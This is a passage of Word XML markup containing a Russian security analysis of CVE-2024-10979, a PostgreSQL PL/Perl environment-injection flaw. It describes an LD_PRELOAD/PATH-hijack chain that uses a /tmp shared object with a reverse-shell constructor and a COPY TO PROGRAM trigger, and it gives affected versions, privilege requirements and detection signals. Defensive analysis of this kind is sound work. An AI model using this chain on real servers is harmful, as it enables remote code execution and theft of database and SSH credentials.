          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$PATH</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/tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> идёт первым, любой бинарь, вызванный по имени (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ps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ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), сначала будет искаться в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp</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Pre-condition — доставка вредоносного файла</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">И LD_PRELOAD, и PATH-hijack требуют, чтобы атакующий заранее положил файл в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на хосте PostgreSQL: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/tmp/x.so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — shared object с конструктор-функцией </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">__attribute__((constructor))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, делающей reverse-shell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/tmp/ps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (или другой ожидаемый бинарь) — shell-скрипт с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Возможные пути доставки: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3.6.4 `lo_export`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (если у атакующего есть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 отдельная привилегия)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file-upload в другом сервисе на том же хосте, который пишет в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp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скомпрометированный CI-runner, выгрузивший артефакты в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp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физический доступ / shared dev-environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Без доставки файла CVE-2024-10979 даёт только модификацию env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, без активного RCE. RCE случается, когда backend следующим действием спавнит подпроцесс, который читает изменённый env: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dlopen()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при LD_PRELOAD, любой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">popen("name")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без полного пути при PATH-hijack. Spawning может прийти из той же сессии (если есть COPY PROGRAM, dblink, postgres_fdw) или из соседнего backend через shared env-cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger — активация preload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">После установки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_PRELOAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и наличия </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/x.so</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SELECT 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- любой следующий запрос, форкающий backend подпроцесс,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- загрузит /tmp/x.so и исполнит конструктор</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В большинстве реалистичных эксплойт-цепочек после CVE-2024-10979 идёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`COPY (SELECT '') TO PROGRAM 'true'`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или вызов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 оба спавнят подпроцесс, который наследует env. Это превращает CVE-2024-10979 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">усилитель</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для существующих векторов: даёт RCE до того, как у атакующего есть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(см. 3.13 — пути его получить).</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При успешном trigger — конструктор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/x.so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> исполняется в адресном пространстве подпроцесса (для LD_PRELOAD) или подменённый бинарь исполняется как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(для PATH-hijack). Эффект — RCE как пользователь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дальше идентично 3.7.1 / 3.7.2a (доступ к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$PGDATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, SSH-ключам,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trusted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использует Perl-модуль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Safe.pm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для ограничения доступного API внутри sandbox. До CVE-2024-10979 список запрещённых operations не включал записи в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 Perl-операция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ENV{key} = value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не падала с ошибкой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">safe mode violation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Фикс — добавление проверки на доступ к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в trusted-режиме (commit в PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">src/pl/plperl/plperl.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). После фикса </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ENV{'X'} = 'Y'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> внутри plperl даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: 'Safe' trapped operation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Корневая причина — общая для CVE-уровня в trusted-языках: Safe.pm не покрывает все векторы env-mutation в Perl (та же проблема была в Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">restricted execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, deprecated в Python 3 целиком). PostgreSQL не контролирует, что именно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Safe.pm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> блокирует — полагается на белый список Perl-операций.</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 (уязвима):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ≤ 17.0, 16.4, 15.8, 14.13, 13.16, 12.20. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Фикс:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 17.1, 16.5, 15.9, 14.14, 13.17, 12.21 (выпущены 14 ноября 2024 г.).</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USAGE</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 выдан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PUBLIC по умолчанию</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потому что plperl trusted.</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схеме — для </w:t>
      </w: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всегда выдан (temp-schema есть у каждой сессии). До PG 15 — на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выдан PUBLIC; с PG 15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ограничен, но pg_temp остаётся.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Superuser не требуется.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должен быть установлен (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION plperl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). На managed-провайдерах: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Google Cloud SQL — plperl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">предоставляется</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в стандартной поставке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AWS RDS — plperl опционально (см. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rds.extensions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> параметр)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Supabase — plperl не предоставляется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OS-зависимости:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Perl-runtime + postgresql-plperl пакет. Те же требования, что для 3.7.2a — обычно идут вместе.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нет специальных требований.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для активного RCE:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> вредоносный файл в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> доставлен другим каналом (см. выше).</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ноября 2024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 17.0, 16.4, 15.8, 14.13, 13.16, 12.20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17.1, 16.5, 15.9, 14.14, 13.17, 12.21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env injection в trusted-sandbox plperl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 privilege escalation без superuser</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Trusted plperl используется для прикладных вычислительных функций (text processing, sanitization) — без манипуляций env, без OS-API. Признаки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ddl_command_end</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prolang = 'plperl'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (trusted) И исходным кодом, содержащим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delete $ENV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это статический сканер, специфичный для CVE-2024-10979.</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pg_proc.prosrc</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regex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внутри тел plperl-функций (не plperlu).</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На уязвимой версии PG (&lt; 17.1 / 16.5 / ...) — любая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FUNCTION ... LANGUAGE plperl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от не-DBA-сессии стоит ревьюить.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Аномальный спавн подпроцессов backend-ом с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
